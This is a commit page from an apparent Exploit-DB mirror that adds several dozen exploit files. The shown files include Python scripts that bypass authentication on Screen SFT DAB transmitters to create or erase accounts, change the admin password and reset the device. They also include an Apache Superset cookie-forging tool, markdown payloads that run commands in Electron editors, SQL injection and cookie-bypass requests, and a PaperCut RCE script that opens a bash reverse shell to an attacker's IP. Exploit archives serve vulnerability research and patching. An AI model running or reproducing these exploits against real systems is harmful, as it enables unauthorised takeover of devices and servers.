bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-05-24

Browse source 
40 changes to exploits/shellcodes/ghdb

Optoma 1080PSTX Firmware C02 - Authentication Bypass
Screen SFT DAB 600/C - Authentication Bypass Account Creation
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
Screen SFT DAB 600/C - Authentication Bypass Erase Account
Screen SFT DAB 600/C - Authentication Bypass Password Change
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)

PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

Apache Superset 2.0.0 - Authentication Bypass

FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)

Affiliate Me Version 5.0.1 - SQL Injection

Best POS Management System v1.0 - Unauthenticated Remote Code Execution

Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

e107 v2.3.2 - Reflected XSS

File Thingie 2.5.7 - Remote Code Execution (RCE)

GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

LeadPro CRM v1.0 - SQL Injection

PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)

Prestashop 8.0.4 - CSV injection

Quicklancer v1.0 - SQL Injection

SitemagicCMS 4.4.3 - Remote Code Execution (RCE)

Smart School v1.0 - SQL Injection

Stackposts Social Marketing Tool v1.0 - SQL Injection

thrsrossi Millhouse-Project 1.414 - Remote Code Execution

TinyWebGallery v2.5 - Remote Code Execution (RCE)

WBiz Desk 1.2 - SQL Injection

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title

Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

MobileTrans  4.0.11 - Weak Service Privilege Escalation

Trend Micro OfficeScan Client 10.0 - ACL Service LPE
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
This commit is contained in:
Exploit-DB 2023-05-24 00:16:34 +00:00
parent 7217cf5c90
commit 0a7adaa3fc
40 changed files with 2532 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
exploits/hardware/remote/51444.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823
Details
By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".
GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close

102
exploits/hardware/remote/51455.py Executable file
View file

@ -0,0 +1,102 @@
#!/usr/bin/env python3
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5771
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber++',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'newUser':{
'password':h,
'type':'OPERATOR',
'username':u
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-5)

102
exploits/hardware/remote/51456.py Executable file
View file

@ -0,0 +1,102 @@
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber+',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'changeUserPswd':{
'username':u,
'password':h
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-4)

94
exploits/hardware/remote/51457.py Executable file
View file

@ -0,0 +1,94 @@
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
e='/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber-',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'removeUser':u
}
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-3)

96
exploits/hardware/remote/51458.py Executable file
View file

@ -0,0 +1,96 @@
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control and requirement of admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber-+',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'changeUserPswd':{
'username':'admin',
'password':h
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-2)

93
exploits/hardware/remote/51459.py Executable file
View file

@ -0,0 +1,93 @@
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
e='/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber--',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'deviceManagement',
'ssbtObj':{
'reset':'true'
}
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-1)

45
exploits/hardware/remote/51460.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
# Exploit Author: LiquidWorm
Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuatio flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.
Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request to gain
access to sensitive information including usernames and source IP
addresses.
Tested on: Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
19.03.2023
--
$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}

22
exploits/hardware/webapps/51448.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
SQLi crashing point:
GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

25
exploits/multiple/local/51469.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Date: 2023-04-24
# Exploit Author: 8bitsec
# CVE: CVE-2023-31873
# Vendor Homepage: https://github.com/mariuskueng/gin
# Software Link: https://github.com/mariuskueng/gin
# Version: 0.7.4
# Tested on: [Mac OS 13]
Release Date:
2023-04-24
Product & Service Introduction: Javascript Markdown editor for Mac
Technical Details & Description:
A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload:
<video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
Opening the file in Gin will auto execute the Calculator application.

28
exploits/multiple/local/51470.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]
Release Date: 2023-04-27
Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
Technical Details & Description:
A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload.
Mac:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
Ubuntu:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
Opening the file in Yank Note will auto execute the Calculator application.

105
exploits/multiple/webapps/51447.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
# Date: 10 May 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://superset.apache.org/
# Version: Apache Superset<= 2.0.1
# Tested on: 2.0.0
# CVE: CVE-2023-27524
from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
from selenium import webdriver
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
SECRET_KEYS = [
b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1
b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1
b'thisISaSECRET_1234', # deployment template
b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation
b'TEST_NON_DEV_SECRET' # docker compose
]
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
args = parser.parse_args()
try:
u = args.url.rstrip('/') + '/login/'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
}
resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
if resp.status_code != 200:
print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
return
session_cookie = None
for c in resp.cookies:
if c.name == 'session':
session_cookie = c.value
break
if not session_cookie:
print('Error: No session cookie found')
return
print(f'Got session cookie: {session_cookie}')
try:
decoded = session.decode(session_cookie)
print(f'Decoded session cookie: {decoded}')
except:
print('Error: Not a Flask session cookie')
return
match = re.search(r'"version_string": "(.*?)&#34', resp.text)
if match:
version = match.group(1)
else:
version = 'Unknown'
print(f'Superset Version: {version}')
for i, k in enumerate(SECRET_KEYS):
cracked = session.verify(session_cookie, k)
if cracked:
break
if not cracked:
print('Failed to crack session cookie')
return
print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
try:
user_id = int(args.id)
except:
user_id = args.id
forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
print(f'Forged session cookie for user {user_id}: {forged_cookie}')
u1 = args.url.rstrip('/') + '/superset/welcome'
print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
except Exception as e:
print(f'Unexpected error: {e}')
if __name__ == '__main__':
main()

115
exploits/multiple/webapps/51452.py Executable file
View file

@ -0,0 +1,115 @@
# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
# Date: 13 May 2023
# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
import requests
import argparse
Group_payload = {
"service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form",
"sp":"S0",
"Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
"$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
"$Hidden$0":"F",
"$Hidden$1":"F",
"$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
"$Hidden$3":"F",
"$Hidden$4":"X",
"$Hidden$5":"X",
"$Hidden$6":"X",
"$Hidden$7":"X",
"$Hidden$8":"X",
"$Hidden$9":"X",
"$Hidden$10":"X",
"$Hidden$11":"X",
"$Hidden$12":"X",
"$Hidden$13":"F",
"$Hidden$14":"X",
"$Hidden$15":"F",
"$Hidden$16":"S",
"$Hidden$17":"S",
"$Hidden$18":"S",
"$Hidden$19":"S",
"$Hidden$20":"F",
"$Hidden$21":"SSTANDARD_UNIX",
"$PropertySelection":"3,CUSTOM",
"$TextField":"/usr/bin/python3",
"$TextField$0":"/usr/bin/python3",
"$RadioGroup":"0",
"primaryCardIdLength":"8",
"secondaryCardIdLength":"8",
"$PropertySelection$4":"0,STANDARD_UNIX",
"$TextField$13":"",
"$TextField$14":"",
"$TextField$15":"",
"$TextField$16":"",
"$RadioGroup$0":"0",
"$PropertySelection$5":"NONE",
"$TextField$17":"",
"$PropertySelection$6":"NONE",
"$TextField$18":"employeeNumber",
"primaryCardId2Length":"8",
"$PropertySelection$7":"NONE",
"$TextField$19":"",
"secondaryCardId2Length":"8",
"$TextField$20":"",
"$Submit$4":"Apply"
}
parser = argparse.ArgumentParser(description="Papercut RCE")
parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
parser.add_argument('--ip',help='our rev shell ip')
parser.add_argument('--port',help='our rev shell port')
args = parser.parse_args()
url = args.url
ip = args.ip
port = args.port
passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"
final_payload = {
"service":"direct/1/Home/$Form$0",
"sp":"S0",
"Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
"$Hidden$0":"true",
"$Hidden$1":"X",
"inputUsername":"help",
"inputPassword":passwd_input,
"$PropertySelection$0":"en",
"$Submit$0":"Log+in"
}
# create a session
session = requests.Session()
# visit the first URL to set up the session
setup_url = url+"/app?service=page/SetupCompleted"
response = session.get(setup_url)
response.raise_for_status() # check for any errors
# visit the second URL using the same session
dashboard_url = url+"/app?service=page/Dashboard"
response = session.get(dashboard_url)
response.raise_for_status() # check for any errors
# URL to change user group
user_group_change_url = url+"/app"
response = session.post(user_group_change_url,data=Group_payload)
response.raise_for_status() # check for errors
# URL to gain RCE
rce_url = url+"/app"
response = session.post(rce_url,data=final_payload)
response.raise_for_status() # Check for any errors
# print the response text
print(response.text)

30
exploits/multiple/webapps/51480.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
# Date: 2023-05-24
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.squarepiginteractive.com
# Software Link: https://www.fusioninvoice.com/store
# Version: 2023-1.0
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
# CVE: CVE-2023-25439
Description:
A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to
execute arbitrary web scripts or HTML.
